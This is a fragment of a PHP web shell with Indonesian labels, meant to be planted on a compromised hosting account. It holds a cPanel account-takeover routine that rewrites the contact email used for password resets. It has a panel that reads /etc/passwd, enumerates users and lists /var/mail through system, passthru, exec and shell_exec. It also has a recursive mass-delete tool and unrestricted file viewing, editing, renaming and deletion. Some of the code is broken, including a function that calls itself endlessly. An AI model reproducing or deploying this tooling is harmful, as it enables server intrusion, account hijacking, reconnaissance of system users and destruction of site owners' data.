<input class="form-control btn-sm" type="email" name="email" placeholder="Masukan Email..."/><br/>
<button class="btn btn-dark btn-sm" name="submit" type="sumbit"><i class="bi bi-arrow-return-right"></i></button>
</div>
</form>';
if (isset($_POST['submit'])) {
$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];
$ips = getenv('REMOTE_ADDR');
$email = $_POST['email'];
$wr = 'email:' . $email;
$f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$f = fopen('/home/' . $user . '/.contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$parm = $site . ':2082/resetpass?start=1';
echo '<br/>Url: ' . $parm . '';
echo '<br/>Username: ' . $user . '';
echo '<br/>Success Reset To: ' . $email . '<br/><br/>';
}
} elseif ($_GET['id'] == 'bypass') {
echo '<br /><div claas="container">
<form method="POST">
<p class="text-center">Bypass etc/passwd With :</p>
<div class="d-flex justify-content-center flex-wrap">
<input type="submit" class="fiture btn btn-dark btn-sm" value="System Function" name="syst">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Passthru Function" name="passth">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Exec Function" name="ex">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Shell_exec Function" name="shex">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Posix_getpwuid Function" name="melex">
</div><hr/>
<p class="text-center">Bypass User With :</p>
<div class="d-flex justify-content-center flex-wrap">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Awk Program" name="awkuser">
<input type="submit" class="fiture btn btn-dark btn-sm" value="System Function" name="systuser">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Passthru Function" name="passthuser">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Exec Function" name="exuser">
<input type="submit" class="fiture btn btn-dark btn-sm" value="Shell_exec Function" name="shexuser">
</div>
</form>';
function bcBypass($dir, $file)
{
bcBypass($dir, $file);
$mail = 'ls /var/mail';
$paswd = '/etc/passwd';
if ($_POST['syst']) {
echo "<textarea class='form-control' rows='13'>";
echo system("cat $paswd");
echo '</textarea><br/>';
}
if ($_POST['passth']) {
echo "<textarea class='form-control' rows='13'>";
echo passthru("cat $paswd");
echo '</textarea><br/>';
}
if ($_POST['ex']) {
echo "<textarea class='form-control' rows='13'>";
echo exec("cat $paswd");
echo '</textarea><br/>';
}
if ($_POST['shex']) {
echo "<textarea class='form-control' rows='13'>";
echo shell_exec("cat $paswd");
echo '</textarea><br/>';
}
if ($_POST['melex']) {
echo "<textarea class='form-control' rows='13'>";
for ($uid = 0; $uid < 6000; $uid++) {
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list($key, $val) = each($ara)) {
echo "$val:";
}
echo 'n';
}
}
echo '</textarea><br/>';
}
if ($_POST['awkuser']) {
echo "<textarea class='form-control' rows='13'>
" . shell_exec("awk -F: '{ print $1 }' $paswd | sort") . '
</textarea><br/>';
}
if ($_POST['systuser']) {
echo "<textarea class='form-control' rows='13'>";
echo system("$mail");
echo '</textarea><br>';
}
if ($_POST['passthuser']) {
echo "<textarea class='form-control' rows='13'>";
echo passthru("$mail");
echo '</textarea><br>';
}
if ($_POST['exuser']) {
echo "<textarea class='form-control' rows='13'>";
echo exec("$mail");
echo '</textarea><br>';
}
if ($_POST['shexuser']) {
echo "<textarea class='form-control' rows='13'>";
echo shell_exec("$mail");
echo '</textarea><br>';
}
}
} elseif ($_GET['id'] == 'delete') {
echo "$_s";
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/$namafile")) {
unlink("" . dirname($dir) . "/$namafile");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "<br>";
}
echo "
<div class='card text-dark'>
<div class='card-header'>
<form method='POST'>
<kbd>$_x Mass delete</kbd>
<br>
<i class='bi bi-folder'></i> Lokasi:
<input class='form-control btn-sm' type='text' name='d_dir' value='$dir'>
<i class='bi bi-file-earmark'></i> Nama file:
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' $_r><br>
<div class='input-group-append'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='mass delete'>
</div>
</form>
</div>
</div>
</div>
<br>";
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<div class="shell pre" id="see"><pre style="font-size:10px;">' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre></div><br/>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//rename file
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '<strong>Rename</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Rename</strong> gagal! ' . er() . '</div>';
}
$_POST['name'] = $_POST['newname'];
}
echo '
<form method="POST">
<div class="input-group mb-3">
<input class="form-control form-control-sm" name="newname" type="text" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input class="btn btn-outline-light btn-sm" type="submit" value="rename"/>
</div>
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '<strong>Edit</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Edit</strong> gagal! ' . er() . '</div>';
}
fclose($fp);
}
echo '
<form method="POST">
<textarea class="form-control form-control-sm" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light btn-sm btn-block" type="submit" value="edit"/>
</form>
<br>';
}
} else {
//delete dir & file
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '<strong>Delete dir</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Delete dir</strong> gagal! ' . er() . '</div>';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '<strong>Delete file</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Delete file</strong> gagal! ' . er() . '</div>';
}
}
}
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=' . dirname($dir) . '">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?id=filebaru&path=' . $dir . '"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&path=' . $dir . '"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';
foreach ($scandir as $dir) {
$dt = date("Y-m-d H:i:s", filemtime("$path/$dir"));
if (function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("$path/$dir"));
$downer = $downer['name'];
} else {
$downer = fileowner("$path/$dir");
}
if (function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("$path/$dir"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("$path/$dir");
}
if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path=$path/$dir\">$dir</a></td>
<td class='text-center'>$dt</td>
<td class='text-center'>dir</td>
<td class='text-center'>$downer<gr>:</gr>$dgrp</td>
<td class='text-center'>";
if (is_writable("$path/$dir")) echo '<gr>';
elseif (!is_readable("$path/$dir")) echo '<rd>';
echo p("$path/$dir");
if (is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</gr></rd></td>';
echo "
<td class=\"text-center\">
<form method=\"POST\" action=\"?option&path=$path\">
<div class=\"btn-group\">
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>
</div>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
</form>
</td>
</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d H:i:s", filemtime("$path/$file"));
if (!is_file($path . '/' . $file)) continue;
if (function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("$path/$file"));
$fowner = $fowner['name'];
} else {
$fowner = fileowner("$path/$file");
}
if (function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("$path/$file"));
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("$path/$file");
}
echo "
<tr>
<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td class='text-center'>$ft</td>
<td class='text-center'>" . sz(filesize($file)) . "</td>
<td class='text-center'>$fowner<gr>:</gr>$fgrp</td>
<td class='text-center'>";
if (is_writable("$path/$file")) echo '<gr>';
elseif (!is_readable("$path/$file")) echo '<rd>';
echo p("$path/$file");
if (is_writable("$path/$file") || !is_readable("$path/$file")) echo '</gr></rd></td>';
echo "
<td class=\"text-center\">
<form method=\"POST\" action=\"?option&path=$path\">
<div class=\"btn-group\">
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"edit\"><i class='bi bi-pencil-square'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"download\"><i class='bi bi-download'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>
</div>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
</form>
</td>
</tr>";
}
}
echo "
</tbody>
</table>
<div class='text-secondary'>© " . date("Y") . " $_n</div>
</div>
</div>
</body>
</html>";